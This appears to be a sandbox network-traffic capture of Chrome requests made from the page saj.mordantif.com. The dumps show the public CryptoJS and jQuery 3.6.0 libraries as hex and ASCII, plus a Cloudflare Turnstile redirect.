                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJtyNhNKK0rt5elM5%2F%2BNSuqKjnqB%2BVClccZyvGfg5CafGETWxJdm6kslxVgqUNHO8zdVJ%2BLkdKsJu6qzz5ekTyIaFWh605pY5Fl7bYs3txHiddbsZx1v5Lss3aP6TmykWs2vvCi9"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 8c285ae73b4e4406-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:32 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                        Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                        Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                        Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                        Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                        Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                        Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                        Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                        Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                        Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                        Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.549728104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:32 UTC386INHTTP/1.1 302 Found
                                                        Date: Fri, 13 Sep 2024 13:06:32 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                        cross-origin-resource-policy: cross-origin
                                                        location: /turnstile/v0/b/388c99dd0998/api.js
                                                        Server: cloudflare
                                                        CF-RAY: 8c285ae73c805e79-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.549727151.101.2.1374433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                        Host: code.jquery.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:32 UTC613INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 89501
                                                        Server: nginx
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                        ETag: "28feccc0-15d9d"
                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                        Access-Control-Allow-Origin: *
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 2424574
                                                        Date: Fri, 13 Sep 2024 13:06:32 GMT
                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740058-EWR
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 5889, 0
                                                        X-Timer: S1726232792.189433,VS0,VE1
                                                        Vary: Accept-Encoding
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
